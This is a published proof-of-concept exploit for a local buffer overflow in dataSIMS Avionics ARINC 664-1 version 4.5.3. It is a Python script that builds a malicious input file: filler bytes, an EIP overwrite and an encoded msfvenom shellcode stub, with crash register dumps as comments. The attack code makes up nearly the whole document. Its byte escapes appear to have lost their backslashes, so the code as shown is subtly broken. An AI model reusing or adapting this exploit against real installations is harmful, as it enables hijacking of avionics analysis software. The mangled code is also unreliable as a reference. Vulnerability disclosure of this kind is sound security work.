Authored by Kagan Capar

dataSIMS Avionics ARINC 664-1 version 4.5.3 suffers from a local buffer overflow vulnerability.

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author: Kagan Capar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# about Sofware:
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# about ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations.
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import struct
import binascii
import os
import sys

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330 ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

file = open("milstd1553result.txt", "w")
junk = "x41" * 600
align = "x32" * 4 + "x31" * 4
prop = "x43" * 380
imp = "x62x7ax68x72x74x75x72x6cx75x32"
imp2 = "x61x72x61x63x61x67x131x7a"

#EIP Overwrite junk value
overwrite = "x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf = b""
buf += b"xdaxc1xd9x74x24xf4x58xbbx0bx7ex97x62x33"
buf += b"xc9xb1x01x31x58x19x83xe8xfcx03x58x15xe9"
buf += b"x8bx7cx9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print len(win32)
file.write(win32)
file.close()